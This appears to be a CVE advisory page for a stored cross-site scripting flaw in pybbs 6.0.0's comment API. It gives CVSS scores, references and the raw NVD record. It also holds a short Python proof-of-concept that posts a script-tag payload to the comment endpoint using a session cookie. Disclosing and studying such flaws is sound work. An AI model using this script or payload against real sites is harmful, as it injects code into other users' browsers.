CVE-2026-4495

Description

A security flaw has been discovered in atjiu pybbs 6.0.0. This impacts the function create of the file src/main/java/co/yiiu/pybbs/controller/api/CommentApiController.java. The manipulation results in cross site scripting. It is possible to launch the attack remotely. The exploit has been released to the public and may be used for attacks.

CVSS Details

CVSS Score

3.5

Severity

LOW

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:L/A:N

Configurations (Affected Products)

No configuration data available.

atjiu pybbs 6.0.0

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests

# Exploit Title: atjiu pybbs 6.0.0 Stored XSS via Comment API
# Date: 2026-03-20
# CVE: CVE-2026-4495

target_url = "http://target-ip/api/comment/create"
# Malicious payload to trigger XSS
payload = "<script>alert('CVE-2026-4495');</script>"

# Attacker needs a valid session cookie (Low Privilege required as per PR:L)
cookies = {
    "JSESSIONID": "valid_attacker_session_cookie"
}

# Data to be sent in the POST request
data = {
    "content": payload,
    "topic_id": "1"
}

try:
    # Send the malicious comment
    response = requests.post(target_url, cookies=cookies, data=data)
    
    if response.status_code == 200:
        print("[+] Payload sent successfully.")
        print("[+] Check the topic page to verify XSS execution.")
    else:
        print(f"[-] Failed to send payload. Status code: {response.status_code}")
except Exception as e:
    print(f"[-] An error occurred: {e}")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-4495
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-4495
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-4495/
[4] VulDB https://vuldb.com/cve/CVE-2026-4495
[5] https://fx4tqqfvdw4.feishu.cn/docx/PN3YdPBpsowyU1xTV1VcVTm9nzg?from=from_copylink
[6] https://vuldb.com/?ctiid.352021
[7] https://vuldb.com/?id.352021
[8] https://vuldb.com/?submit.773780

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-4495", "sourceIdentifier": "[email protected]", "published": "2026-03-20T18:16:18.000", "lastModified": "2026-04-29T01:00:01.613", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "A security flaw has been discovered in atjiu pybbs 6.0.0. This impacts the function create of the file src/main/java/co/yiiu/pybbs/controller/api/CommentApiController.java. The manipulation results in cross site scripting. It is possible to launch the attack remotely. The exploit has been released to the public and may be used for attacks."}, {"lang": "es", "value": "Se ha descubierto una falla de seguridad en atjiu pybbs 6.0.0. Esto afecta a la función create del archivo src/main/java/co/yiiu/pybbs/controller/API/CommentApiController.java. La manipulación resulta en cross site scripting. Es posible lanzar el ataque remotamente. El exploit ha sido publicado y puede ser utilizado para ataques."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 2.0, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "PASSIVE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:L/A:N", "baseScore": 3.5, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.1, "impactScore": 1.4}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:S/C:N/I:P/A:N", "baseScore": 4.0, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "SINGLE", "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "availabilityImpact": "NONE"}, "baseSeverity": "MEDIUM", "exploitabilityScore": 8.0, "impactScore": 2.9, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-79"}, {"lang": "en", "value": "CWE-94"}]}], "references": [{"url": "https://fx4tqqfvdw4.feishu.cn/docx/PN3YdPBpsowyU1xTV1VcVTm9nzg?from=from_copylink", "source": "[email protected]"}, {"url": "https://vuldb.com/?ctiid.352021", "source": "[email protected]"}, {"url": "https://vuldb.com/?id.352021", "source": "[email protected]"}, {"url": "https://vuldb.com/?submit.773780", "source": "[email protected]"}]}}